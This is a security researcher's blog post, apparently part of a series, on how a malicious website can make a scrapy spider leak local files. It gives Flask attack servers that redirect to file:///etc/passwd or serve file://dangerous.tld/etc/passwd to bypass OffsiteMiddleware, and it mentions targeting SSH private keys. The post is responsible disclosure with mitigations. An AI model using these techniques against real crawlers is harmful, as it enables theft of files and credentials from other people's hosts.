“Web scraping considered dangerous”: Leaking files from the spider’s host
--
This is the next post in the series called “Web scraping considered dangerous”. You can read the previous post here, and as an update, my pull request fixing the FormRequest.from_response behaviour was merged!
This post is again based on scrapy (version 1.6.0) and I’ll show two techniques to leak files from the spider’s host. It’s not that easy, though: the website must meet certain requirements for the exploitation to succeed. Let’s get to the facts!
Website’s structure premise
Websites return data in multiple formats (html, xml, json, csv, plaintext, etc.) and the exploitation exposed in this post relies on a tight relationship between the data format and the website structure. I’m going to simplify the scenario by choosing the plaintext data format since:
- It doesn’t follow a strict format (unlike, say, JSON), so the spider is more tolerant when processing different data (expected content vs injected content).
- Most files can be read as plain text files :)
- It will become clearer later.
Based on this choice of data format, the website must meet the following requirement:
It must have an endpoint returning plain text data that is used to build the next requests. It doesn’t matter what data format the rest of the endpoints return.
For example, it could be a website with a category sitemap endpoint that returns a list of categories, and the spider then requests each of these categories.
Case 1
Continuing with the previous idea, our first case can be drawn exactly under the premise:
- The /sitemap endpoint contains the list of categories of the website. It’s a plain text list, each category separated by a newline (plaintext format).
- /category?name=<category> returns the number of products in the category.
Using Flask, we can create a web application running at http://dangerous.tld
and the underlying code will look like:
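(A minimal sketch; the route names follow the premise above, while the categories and product counts are just illustrative.)

```python
from flask import Flask, Response, jsonify, request

app = Flask(__name__)

# illustrative data: category name -> number of products
CATEGORIES = {'books': 10, 'movies': 20, 'music': 30}


@app.route('/sitemap')
def sitemap():
    # plain text response: one category per line
    return Response('\n'.join(CATEGORIES), mimetype='text/plain')


@app.route('/category')
def category():
    # JSON response with the number of products of the requested category
    name = request.args.get('name', '')
    return jsonify(category=name, products=CATEGORIES.get(name, 0))


if __name__ == '__main__':
    # assume the app is reachable as http://dangerous.tld
    app.run(host='0.0.0.0', port=80)
```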
If we want to get the number of products, we will need to create a scrapy spider like this:
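(Again a sketch; the spider name and callbacks are illustrative, the endpoints match the premise.)

```python
import json

import scrapy


class CategoriesSpider(scrapy.Spider):
    name = 'categories'
    allowed_domains = ['dangerous.tld']
    start_urls = ['http://dangerous.tld/sitemap']

    def parse(self, response):
        # /sitemap is plain text: one category name per line
        for line in response.text.splitlines():
            url = 'http://dangerous.tld/category?name=%s' % line
            yield scrapy.Request(url, callback=self.parse_category)

    def parse_category(self, response):
        # /category answers with JSON containing the number of products
        yield json.loads(response.text)
```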
This spider goes to the /sitemap endpoint, gets the list of categories and requests the page of each one of them, yielding the number of products of each category. This is the output of the spider:
Everything works well, but what happens if the website becomes a malicious actor?
Our old friend, redirect!
As mentioned in our previous post, there’s an issue with the OffsiteMiddleware and in my words:
However, an interesting behavior happens when there’s a request to a page in an allowed domain but redirects to a not allowed domain, since it won’t be filtered and will be processed by the spider.
Ok, as a malicious actor I could modify the web application so that the /sitemap endpoint redirects to a URL of my choice. When the spider runs, it will request the /sitemap endpoint and follow the redirect; then, in the parse method, it will split the response into lines and exfiltrate the contents to /category?name=<line>, using as many requests as there are lines in the response.
What should be the URL of my choice? It’s a kind of SSRF (or as I’ve dubbed it, “Spider-Side Request Forgery”), so we have:
- If the spider is running in the cloud, the URL could be a metadata URL.
- Local services (as I did in the previous post)
- LAN servers
Something else? scrapy tries to mimic a lot of browser behavior but it’s not a real browser. How does it support requesting https or s3 URLs? It uses downloader handlers, and among them there’s a file handler. It adds support for the file protocol, so file:///etc/passwd is a valid URI that gets translated to /etc/passwd on the spider’s filesystem.
Can we redirect /sitemap to file:///etc/passwd and exfiltrate that file? Yep, we’re turning this into SSRF+LFI.
Now, we modify our malicious app to look like this:
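(Sketch of the modified app; only the /sitemap redirect matters, /category keeps answering JSON no matter the input.)

```python
from flask import Flask, jsonify, redirect, request

app = Flask(__name__)


@app.route('/sitemap')
def sitemap():
    # redirect the spider to a file on its own filesystem
    return redirect('file:///etc/passwd')


@app.route('/category')
def category():
    # each request leaks one line of that file in the "name" parameter
    # (visible in the server's access log); keep answering valid JSON
    return jsonify(category=request.args.get('name', ''), products=0)
```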
When the spider runs, on the server side we will receive the following output:
With our malicious app, we’ve successfully exfiltrated /etc/passwd from the spider’s host. Since the category endpoint returns a JSON response without caring about the input, the spider leaks the file and doesn’t raise any error. What other sensitive files are available?
- /proc/self/environ and friends
- Files in /etc
- Files like /.dockerenv if they exist
With this spider, getting a private SSH key would take two spider runs: one to get /etc/passwd and find the local user, and a second one to try /home/<user>/.ssh/id_rsa. I did something similar in 2014 in the “Exploiting the scraper” post (one spider run, but a different kind of spider).
In fact, how much information you can leak and how many spider runs it requires depends entirely on the combination of website structure and spider. In the worst case, you could create a malicious app that sets up a vicious circle in the crawl flow and exfiltrates a large number of files in a single spider run.
It’s important to note that, as scrapy makes asynchronous requests, we can’t guarantee the integrity of the exfiltrated file. For example, if we exfiltrate a file like a private SSH key, which contains around 27 lines, we will receive its content shuffled and will have to reorder it somehow (brute force, I guess) to get the original file.
Case 2
Now we’re going to change the web application. Sometimes we have to visit a page to get server-side information needed for the next steps. In this case, the web application generates a token at /token_sitemap that we need to add to the subsequent requests to /token_category. Here’s the new application:
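(A sketch; the endpoint and template names come from the description above, the token handling and the data are illustrative.)

```python
import uuid

from flask import Flask, jsonify, render_template, request

app = Flask(__name__)

VALID_TOKENS = set()


@app.route('/token_sitemap')
def token_sitemap():
    # generate a token and embed the next URL (token included) in the page
    token = uuid.uuid4().hex
    VALID_TOKENS.add(token)
    url = 'http://dangerous.tld/token_category?name=books&token=%s' % token
    return render_template('first.html', url=url)


@app.route('/token_category')
def token_category():
    # only answer when a previously issued token is provided
    if request.args.get('token') not in VALID_TOKENS:
        return jsonify(error='invalid token'), 403
    return jsonify(category=request.args.get('name', ''), products=10)
```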
The template first.html is simple: it echoes the url parameter in an anchor tag:
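(Roughly something like this, under templates/first.html:)

```html
<html>
  <body>
    <a href="{{ url }}">{{ url }}</a>
  </body>
</html>
```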
A spider for this new website would look like this:
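(A sketch again; the spider name and callbacks are illustrative.)

```python
import json

import scrapy


class TokenCategoriesSpider(scrapy.Spider):
    name = 'token_categories'
    allowed_domains = ['dangerous.tld']
    start_urls = ['http://dangerous.tld/token_sitemap']

    def parse(self, response):
        # grab the full URL (token included) from the anchor tag
        url = response.xpath('//a/@href').extract_first()
        yield scrapy.Request(url, callback=self.parse_category)

    def parse_category(self, response):
        yield json.loads(response.text)
```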
In parse, it uses an XPath selector to get the full URL (token included) from the response body and requests it. The spider works and gets the number of products in the category.
Let’s be malicious now!
In our application, at the token_sitemap endpoint we’re passing a URL to the template. What if we change this URL to file:///etc/passwd? This is the change:
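(Keeping the rest of the sketch untouched, only this endpoint changes:)

```python
@app.route('/token_sitemap')
def token_sitemap():
    # hand the spider a file:// URI instead of a category URL
    return render_template('first.html', url='file:///etc/passwd')
```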
Running the spider (always in DEBUG
mode) I get the following output:
Nothing happened. If we manually review the endpoint, this is the response:
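(With the template sketched earlier, it would be along these lines:)

```html
<html>
  <body>
    <a href="file:///etc/passwd">file:///etc/passwd</a>
  </body>
</html>
```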
The URL is correctly extracted by the spider and the request is created, but it never reaches the malicious webserver and there isn’t any error message. We have to dig into it.
Debugging what’s happening
My first suspect was the OffsiteMiddleware: in the redirect case we avoided it, but maybe we’re hitting it now and that’s why the request to file:///etc/passwd is never made. It’s also weird because this middleware usually logs offsite messages, but not in this case. The full middleware file is here, but we’re going to review only the interesting parts:
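(Roughly how the relevant methods of scrapy/spidermiddlewares/offsite.py look in scrapy 1.6, slightly abridged; check the actual file for the exact code.)

```python
def process_spider_output(self, response, result, spider):
    for x in result:
        if isinstance(x, Request):
            if x.dont_filter or self.should_follow(x, spider):
                yield x
            else:
                domain = urlparse_cached(x).hostname
                if domain and domain not in self.domains_seen:
                    self.domains_seen.add(domain)
                    logger.debug(
                        "Filtered offsite request to %(domain)r: %(request)s",
                        {'domain': domain, 'request': x}, extra={'spider': spider})
                    self.stats.inc_value('offsite/domains', spider=spider)
                self.stats.inc_value('offsite/filtered', spider=spider)
        else:
            yield x

def should_follow(self, request, spider):
    regex = self.host_regex
    # hostname can be None for wrong urls (like javascript links)
    host = urlparse_cached(request).hostname or ''
    return bool(regex.search(host))
```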
The result argument contains our Request object with url=file:///etc/passwd. At line 4 there’s a check: the first condition, x.dont_filter, is False, and the logic of the second condition is at line 18.
In short, should_follow() verifies whether the hostname of the url matches the host_regex regular expression. This regular expression is built from the allowed_domains attribute of the spider, so it checks whether the url hostname is dangerous.tld or a subdomain of it. From the python console, we have this:
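(A sketch of that console session; host_regex is built from allowed_domains, roughly like this.)

```python
>>> import re
>>> from urllib.parse import urlparse
>>> host_regex = re.compile(r'^(.*\.)?(dangerous\.tld)$')
>>> urlparse('http://dangerous.tld/category?name=books').hostname
'dangerous.tld'
>>> bool(host_regex.search('dangerous.tld'))
True
>>> urlparse('file:///etc/passwd').hostname is None
True
>>> bool(host_regex.search(''))  # should_follow() falls back to '' when hostname is None
False
```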
Our url=file:///etc/passwd doesn’t have a hostname, so the check fails. The flow continues at line 7, and line 8 again checks the hostname of our url; as it’s None, it doesn’t enter the if block, which is why the offsite warning is not emitted by scrapy. Either way, our request is discarded.
Can a file protocol URI have a hostname? I didn’t know, but according to the RFC, yep. Taking this into consideration, our new url becomes file://dangerous.tld/etc/passwd.
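(Back in the same console session, the new URI now passes the hostname check.)

```python
>>> urlparse('file://dangerous.tld/etc/passwd').hostname
'dangerous.tld'
>>> bool(host_regex.search('dangerous.tld'))
True
```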
Running the spider again, we can see in the log that /etc/passwd is exfiltrated, bypassing the OffsiteMiddleware 🏆:
Conclusions
When you do web scraping, it’s a one-way flow: the spider extracts information from the website and not the other way around. However, in the presence of a series of factors, malicious actors might be able to exfiltrate data from spiders’ hosts, compromising private information in an unexpected way.
In my opinion, the lessons from this post are:
- Run your spiders in isolated environments.
- There’s a thing about the file protocol. It’s useful in cases like starting a spider with a local file as initial input to test something, but apart from that it’s rarely used. What about a schema change from https to file, as seen in the redirect exploitation? Do browsers allow that? How do I protect myself from it? If I scrape a website using only https URLs, is there a setting to accept only http/https URLs and reduce my attack surface? (See the sketch after this list.)
- The redirect issue is a serious concern.
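(A partial answer that already exists, as far as I know: download handlers can be disabled per scheme from the project settings. A sketch:)

```python
# settings.py: disable the file:// download handler to reduce the attack surface
DOWNLOAD_HANDLERS = {
    'file': None,
}
```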
I’m going to report these issues and collaborate with the scrapy development team to find a solution. I hope that by the next post I’ll have some news about these concerns and how we fixed them.